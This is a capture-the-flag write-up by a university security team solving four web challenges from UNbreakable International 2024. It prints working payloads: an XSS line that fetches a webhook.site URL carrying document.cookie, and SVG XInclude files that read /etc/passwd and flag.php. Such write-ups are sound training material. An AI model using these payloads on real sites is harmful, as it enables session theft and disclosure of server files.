# Description HCS (Heroes Cyber Security) official cybersecurity team of Institut Teknologi Sepuluh Nopember has participated on UNbreakable International 2024 - Team Phase CTF. We managed to 2nd place out of 341 teams, thank you for @daffainfo, @kerupuksambel, and @iktaS who's had participate with me to solve the challenges. For the information, challenges that we solved are fully blackbox. Even so we still managed to complete all the Web Exploitation challenges. [toc] # get-poc > Can you get a working POC for this vulnerability? Flag format: ctf{sha256sum} ## Description We exploit the `poc` parameter on $_GET request, to make Remote Code Execution and read the flag. ## Solve We you visit the website, we will get like this. ![getpoc1](https://hackmd.io/_uploads/BJo5cbexR.png) We see the hashtag on `missing poc in get`, so we initially test it ![getpoc2](https://hackmd.io/_uploads/HJ_A5Wgg0.png) But the response of the website. ![getpoc3](https://hackmd.io/_uploads/rkJ-sZlgR.png) Well, according to my conclusion the parameter is executing eval, so we just need call the function to get RCE. ![getpoc4](https://hackmd.io/_uploads/Sky_ibegC.png) Unfortunately, `system` function of PHP is disabled then we found this article [PHP Execution Operator](https://www.php.net/manual/en/language.operators.execution.php). Somehow, we can execute it if using backtick operator then we try it again. ![getpoc5](https://hackmd.io/_uploads/HyhZhbxe0.png) Successfully get the RCE and we read the flag. ![getpocflag](https://hackmd.io/_uploads/SkiQ2-xlA.png) ``` ctf{6d4e8ef22eb3448e8655571e8b769f15fdef4fb4cfb0d108eb38664c96005c89} ``` # bad-dev > Get the flag. ## Description SSTI on the form, RCE and get the flag. ## Solve When firstly look at the website framework, i was just feel this was like `SSTI` because using Flask. ![badev1](https://hackmd.io/_uploads/S1VbpblgC.png) We visit the website and inputted some text to form. ![badev2](https://hackmd.io/_uploads/BJ3Va-lg0.png) Try to change the value of parameter, to check if it's vulnerable to SSTI. ![badev3](https://hackmd.io/_uploads/H1cYp-elC.png) Well the result is `49`, as my concern so we just can do RCE by using the [SSTI Payload](https://github.com/payloadbox/ssti-payloads). ![badev4](https://hackmd.io/_uploads/Bk5AaZgxC.png) Successfully do RCE, and read the flag. ![badevflag](https://hackmd.io/_uploads/BJUxCZxlA.png) ``` CTF{4e86532c1b513931d809f9ad01baa4290c8449c4db9628b8ba5b23dbbb932db8} ``` # xfit > Picture this: within the vast expanse of the digital realm, lies a crucial secret vault—a clandestine cache known as cookies. But beware, for these digital treasures are not scattered haphazardly. No, they are meticulously guarded within the confines of their respective domains, each one a sentinel of its cyber kingdom. It's a thrilling saga of hidden treasures and guarded gateways, where the very essence of your online identity hangs in the balance! ## Description SSRF + Blind XSS at the contact form, and get the flag. ## Solve Given a website, that has a contact form. ![fit1](https://hackmd.io/_uploads/SkJybGlgA.png) We test it by send the `webhook` url, to test it's vulnerable to SSRF. ![fit2](https://hackmd.io/_uploads/SkeGbfle0.png) Found that it's vulnerable to SSRF. ![fit3](https://hackmd.io/_uploads/rJca4Gxe0.png) Then we try send cookie to webhook. ```html=1 <img+src+onerror="fetch('http://webhook.site/999ba582-fb82-4953-84b7-78fb0091002a?'+document.cookie)"> ``` ![fit4](https://hackmd.io/_uploads/HkzyHzeeR.png) But the value was empty. ![fit5](https://hackmd.io/_uploads/SJKISzlxR.png) After that, we notice some endpoint like this. ![fit6](https://hackmd.io/_uploads/H1EdBGxlC.png) We try to inject the code, and seem's vulnerable to XSS. ![fit7](https://hackmd.io/_uploads/ryZcHfxx0.png) After that back again to contact form, and make the payload like this with URL encoded 2 times. ``` http://localhost/error.html?err=403%2527%2522%253E%253Cimg%2520src%2520onerror=%2522fetch(%2527https://webhook.site/999ba582-fb82-4953-84b7-78fb0091002a?%2527%252bdocument.cookie)%2522%253E ``` ![fit8](https://hackmd.io/_uploads/SJU6rGelA.png) And we got the flag. ![fitflag](https://hackmd.io/_uploads/SJMZ8GexA.png) ``` CTF{5a9f641002782d51bdc46a22bb013cf0fd14ee5a6a094bb39a946806a0a1cf08} ``` # profile-pic > Can you change my profile picture in a hacker way? Flag format: ctf{sha256sum} ## Description Exploit of CVE-2023-38633 lead to path traversal. ## Solve Get a web that's simply we need upload file on it. ![profile1](https://hackmd.io/_uploads/HJqi5QlxA.png) When i'am trying to upload php file. ![profile2](https://hackmd.io/_uploads/BJZaqQxgC.png) We do some recon, and found this article [CVE-2023-38633](https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/). The payload for `svg` file was like this ```html=1 <?xml version="1.0" encoding="UTF-8" standalone="no" ?> <svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude"> <rect width="300" height="300" style="fill:rgb(255,204,204);" /> <text x="0" y="100"> <xi:include href=".?../../../../../../../etc/passwd" parse="text" encoding="ASCII" > <xi:fallback>file not found</xi:fallback> </xi:include> </text> </svg> ``` Since the form upload is limitted to 50 pixels, we can adjust at the line `2` by 50x50. And change the path to `/var/www/html/flag.php`, then final payload like this. ```html=1 <?xml version="1.0" encoding="UTF-8" standalone="no" ?> <svg width="50px" height="50px" xmlns:xi="http://www.w3.org/2001/XInclude"> <rect width="1300" height="300" style="fill:rgb(255,204,204);" /> <text x="-100" y="25" font-size="0.7em"> <xi:include href=".?../../../../../../../var/www/html/flag.php" parse="text" encoding="ASCII" > <xi:fallback>file not found</xi:fallback> </xi:include> </text> </svg> ``` Got the half flag. ![profileflag](https://hackmd.io/_uploads/B1tghXglA.png) Because of the limited pixels, we can adjust at the line `4` at X to `-150`, `-200`, `-250`, and goes on. Then the final flag. ``` ctf{af0a742b17dd73ca3d8ff27c885350a890c4ab104670fa3373de63c7709925b0} ```